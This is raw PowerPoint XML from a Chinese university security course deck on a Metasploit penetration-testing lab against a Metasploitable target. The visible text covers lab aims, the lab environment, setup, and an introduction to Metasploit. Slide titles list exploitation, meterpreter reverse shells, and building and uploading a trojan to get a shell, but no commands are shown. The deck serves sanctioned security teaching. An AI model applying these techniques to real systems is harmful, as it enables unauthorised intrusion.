            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>实验原理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>实验内容</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>实验要求</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>报告提交</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126"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="151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实验目的</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>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sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>通过用metasploit针对metasploitable的渗透测试，掌握几种渗透测试技术，具备解决网络攻防中的几类技术问题能力</a:t>
            </a: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sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>具备网络系统安全分析能力</a:t>
            </a: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sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>系统级渗透与安全防护演练</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="469900" marR="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pPr>
            <a:r>
              <a:rPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>搜寻实验靶机的系统漏洞，并通过实验攻击机对实验靶机进行攻击。</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281"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="502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586175"/>
            <a:ext cx="10969200" cy="705600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 2. </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>实验环境</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="469900" indent="-469900" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>黄鹤靶场实训环境</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="469900" indent="-469900" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://222.20.126.93</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>，用户名和口令为自己的学号</a:t>
            </a:r>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9065"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="390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29267-739A-4CA4-8A3C-A0A5FC1A2C0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>实验环境</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DAE5278-AA4D-4EB8-8897-F4A955F4E892}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="829529" y="1490398"/>
            <a:ext cx="10969200" cy="5083719"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Vmware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> tools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>安装：</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Iso</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件地址：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> VMware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>安装地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\VMware Workstation\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>linuxPreGlibc25.iso</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89E203C9-9017-4BCF-8160-A8F986815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362" y="1889778"/>
            <a:ext cx="78105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102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Metasploit简介</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Metasploit是目前世界上领先的渗透测试工具，也是信息安全与渗透测试领域最大的开源项目之一。它彻底改变了我们执行安全测试的方式。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Metasploit之所以流行，是因为它可以执行广泛的安全测试任务，从而简化渗透测试的工作。Metasploit适用于所有流行的操作系统，本实验中，主要以Kali Linux为主。因为Kali Linux预装了 Metasploit 框架和运行在框架上的其他第三方工具。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="240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431"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="2943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1.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="REFSHAPE" val="485879916"/>
  <p:tag name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:6260,&quot;width&quot;:13770}"/>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6.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="REFSHAPE" val="1110359844"/>
  <p:tag name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:5327,&quot;width&quot;:8299}"/>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emplate/>
  <TotalTime>4237</TotalTime>
  <Words>2081</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>246</Paragraphs>
  <Slides>31</Slides>
  <Notes>7</Notes>
  <HiddenSlides>1</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微软雅黑</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office 主题​​</vt:lpstr>
      <vt:lpstr>网络空间安全综合实践（III）</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>实验1 Metasploitable 渗透测试</vt:lpstr>
      <vt:lpstr>实验内容</vt:lpstr>
      <vt:lpstr>1. 实验目的</vt:lpstr>
      <vt:lpstr> 2. 实验环境</vt:lpstr>
      <vt:lpstr>实验环境</vt:lpstr>
      <vt:lpstr>Metasploit简介</vt:lpstr>
      <vt:lpstr>Metasploit框架和相关术语简介</vt:lpstr>
      <vt:lpstr>Metasploitable靶机</vt:lpstr>
      <vt:lpstr>信息收集</vt:lpstr>
      <vt:lpstr>扫描工具——nmap</vt:lpstr>
      <vt:lpstr>端口扫描——db_nmap</vt:lpstr>
      <vt:lpstr>应用程序扫描</vt:lpstr>
      <vt:lpstr>漏洞分析与发现</vt:lpstr>
      <vt:lpstr>nmap脚本引擎扫描漏洞</vt:lpstr>
      <vt:lpstr>漏洞利用</vt:lpstr>
      <vt:lpstr>后渗透阶段</vt:lpstr>
      <vt:lpstr>meterpreter中常见的反弹类型</vt:lpstr>
      <vt:lpstr>渗透实例</vt:lpstr>
      <vt:lpstr>渗透实例</vt:lpstr>
      <vt:lpstr>渗透实例</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>davtest用法</vt:lpstr>
      <vt:lpstr>davtest执行结果</vt:lpstr>
      <vt:lpstr>制作木马，本地监听</vt:lpstr>
      <vt:lpstr>上传木马</vt:lpstr>
      <vt:lpstr>执行木马，获得shell</vt:lpstr>
      <vt:lpstr>实验任务</vt:lpstr>
      <vt:lpstr>下一节课任务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实验1 Metasploitable 渗透测试</dc:title>
  <dc:creator>wmz</dc:creator>
  <cp:lastModifiedBy>wer_sec@qq.com</cp:lastModifiedBy>
  <cp:revision>201</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-06-19T02:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-24T10:25:28Z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